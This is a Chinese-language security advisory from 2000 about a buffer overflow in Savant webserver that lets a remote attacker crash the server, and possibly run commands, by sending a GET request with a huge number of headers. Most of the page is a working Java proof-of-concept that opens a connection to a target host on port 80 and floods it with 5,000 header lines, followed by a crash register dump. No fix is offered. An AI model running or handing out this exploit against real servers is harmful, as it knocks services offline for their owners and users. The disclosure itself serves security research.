Savant webserver 远程拒绝服务漏洞
发布日期:2000-07-11
更新日期:2000-07-11
受影响系统:
Savant webserver
描述:
Savant webserver存在一个远程拒绝服务攻击漏洞。当接收到一个包含超长header域的
GET请求时,Savant webserver就会发生缓冲区溢出,停止响应连接请求。攻击者也可能
远程执行任意命令。
<* 来源:Andrew Lewis aka. Wizdumb [MDMA] wizdumb@leet.org *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/* The MDMA Crew's proof-of-concept code for the buffer overflow in Savant
* Written by Wizdumb <wizdumb@leet.org || www.mdma.za.net/fk>
*
* The overflow occurs when the server recieves too many headers in the GET
* request. The results of the attack look something like...
*
* SAVANT caused an invalid page fault
* in module KERNEL32.DLL at 015f:bff87eb5.
*
* Registers:
*
* EAX=c00300ec CS=015f EIP=bff87eb5 EFLGS=00010212
* EBX=0119ff90 SS=0167 ESP=0109ffc4 EBP=010a0030
* ECX=010a01e4 DS=0167 ESI=8162f198 FS=20f7
* EDX=bff76859 ES=0167 EDI=010a020c GS=0000
*
* Bytes at CS:EIP:
* 53 56 57 8b 30 83 7d 10 01 8b 4e 38 89 4d f8 75
*
* Stack dump:
*
* Enjoy!
* Andrew Lewis aka. Wizdumb [03/07/2000]
*/
import java.io.*;
import java.net.*;
class savantstack {
public static void main(String[] args) throws IOException {
if (args.length != 1) {
System.out.println("Syntax: java savantstack [hostname/ip]");
System.exit(1); }
Socket soq = null;
PrintWriter white = null;
int i = 5000; // This should do fine :-)
soq = new Socket(args[0], 80);
white = new PrintWriter(soq.getOutputStream(), true);
System.out.print("Showing " + args[0] + " the phj33r :P ...");
white.print("GET /index.html HTTP/1.0");
for (int x = 0; x < i; x++) white.println("A:A");
white.println("\n");
System.out.println("Done!");
white.close();
soq.close(); } }
建议:
暂无
浏览次数:5824
严重程度:0(网友投票)